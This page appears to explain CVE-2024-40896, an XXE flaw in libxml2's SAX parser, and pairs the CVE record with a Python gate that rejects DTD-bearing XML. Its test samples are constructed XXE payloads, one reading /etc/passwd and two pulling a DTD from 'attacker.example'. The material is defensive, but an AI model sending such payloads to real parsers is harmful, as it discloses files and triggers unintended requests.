libxml2: XML External Entity (XXE) in SAX Parser (CVE-2024-40896) #shorts

CVE-2024-40896 is a critical vulnerability in libxml2 that affects the 2.11 series before 2.11.9, the 2.12 series before 2.12.9, and the 2.13 series before 2.13.3. The flaw is in how the SAX parser handles XML external entities. Downstream code that wants to block external entity expansion can install a custom SAX handler that overrides the parser's entity lookup and hands back an entity marked as already "checked", so that the parser is not supposed to fetch or expand it. In the affected versions the parser still produces events for such external entities, so the override does not actually prevent expansion and the application stays open to classic XML External Entity (XXE) attacks: an attacker who controls the XML input can make the parser read local files or reach network resources, disclosing sensitive data or triggering requests the application never intended. Applications that rely on this kind of handler-level protection should update to 2.11.9, 2.12.9, or 2.13.3 rather than trust the override.
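Since the advisory shows that a SAX-level override of entity content cannot be relied on in affected versions, the most dependable application-side defence (besides upgrading) is to refuse documents that declare a DTD at all before they reach a libxml2-based parser, and, where a DTD must be tolerated, to reject any external subset, external general entity or external parameter entity. The scanner below is an added example written for this page, not code from libxml2 or from the video; the payloads it checks are constructed samples, and the function names (`find_external_references`, `is_safe_to_parse`) are this example's own.

```python
import re

# Constructed sample inputs for this example (not taken from the advisory).
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""

PARAMETER_ENTITY_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<data>x</data>
"""

EXTERNAL_SUBSET = """<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://attacker.example/evil.dtd">
<data>x</data>
"""

INTERNAL_ONLY = """<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY greet "hello"> ]>
<data>&greet;</data>
"""

BENIGN = """<?xml version="1.0"?>
<data>hello</data>
"""

# XML keywords are case-sensitive, so "<!DOCTYPE", "SYSTEM" and "PUBLIC" are
# matched exactly. The DOCTYPE pattern captures an optional external ID ("rest")
# and an optional internal subset between "[" and "]".
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+(?P<name>[^\s\[>]+)(?P<rest>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>",
    re.S,
)
# SYSTEM takes one quoted literal (the URI); PUBLIC takes a public id then the URI.
EXT_ID_RE = re.compile(r"\b(SYSTEM|PUBLIC)\s+(\"[^\"]*\"|'[^']*')(?:\s+(\"[^\"]*\"|'[^']*'))?")
# Entity declarations inside the internal subset; "% name" marks a parameter entity.
ENTITY_RE = re.compile(r"<!ENTITY\s+(?P<pe>%\s+)?(?P<name>\S+)\s+(?P<body>[^>]*)>")


def _system_uri(ext):
    """Return the system identifier (URI) from an EXT_ID_RE match, without quotes."""
    if ext.group(1) == "PUBLIC" and ext.group(3):
        return ext.group(3)[1:-1]
    return ext.group(2)[1:-1]


def find_external_references(xml_text):
    """List every external subset or external entity declared in the DOCTYPE.

    Each finding is a tuple (kind, name, uri). This is a reporting aid; the
    regexes stop at a stray ">" inside a quoted literal, so the strict gate in
    is_safe_to_parse does not depend on them.
    """
    findings = []
    for m in DOCTYPE_RE.finditer(xml_text):
        ext = EXT_ID_RE.search(m.group("rest") or "")
        if ext:
            findings.append(("external-subset", m.group("name"), _system_uri(ext)))
        for e in ENTITY_RE.finditer(m.group("subset") or ""):
            ext = EXT_ID_RE.search(e.group("body"))
            if ext:
                kind = "external-parameter-entity" if e.group("pe") else "external-entity"
                findings.append((kind, e.group("name"), _system_uri(ext)))
    return findings


def is_safe_to_parse(xml_text, allow_internal_dtd=False):
    """Gate a document before it reaches the XML parser.

    Strict mode (default) refuses any DOCTYPE, which is what most services
    should do. Lenient mode tolerates a purely internal DTD but still refuses
    anything that points outside the document.
    """
    if "<!DOCTYPE" not in xml_text:
        return True
    if not allow_internal_dtd:
        return False
    return not find_external_references(xml_text)


if __name__ == "__main__":
    samples = [("benign", BENIGN), ("internal-only DTD", INTERNAL_ONLY),
               ("classic XXE", XXE_PAYLOAD), ("parameter entity", PARAMETER_ENTITY_PAYLOAD),
               ("external subset", EXTERNAL_SUBSET)]
    for label, doc in samples:
        print(f"{label:18} strict={is_safe_to_parse(doc)!s:5} "
              f"lenient={is_safe_to_parse(doc, allow_internal_dtd=True)!s:5} "
              f"{find_external_references(doc)}")
```

The gate runs on the raw bytes-as-text before any parser is involved, so it holds regardless of which libxml2 version or language binding sits behind it; the reporting helper is there so that rejected documents can be logged with the URI the attacker was trying to reach.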

Watch the full video on YouTube: CVE-2024-40896

CVE database technical details

CVE ID: CVE-2024-40896
Description: In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by setting "checked"). This makes classic XXE attacks possible.
Provider: mitre
CWE / problem types: CWE-611 Improper Restriction of XML External Entity Reference
Affected software versions (libxml2, semver ranges):
  2.11.0 and later, before 2.11.9
  2.12.0 and later, before 2.12.9
  2.13.0 and later, before 2.13.3
Date published: 2024-12-23T00:00:00.000Z
Last updated: 2025-02-28T13:07:30.165Z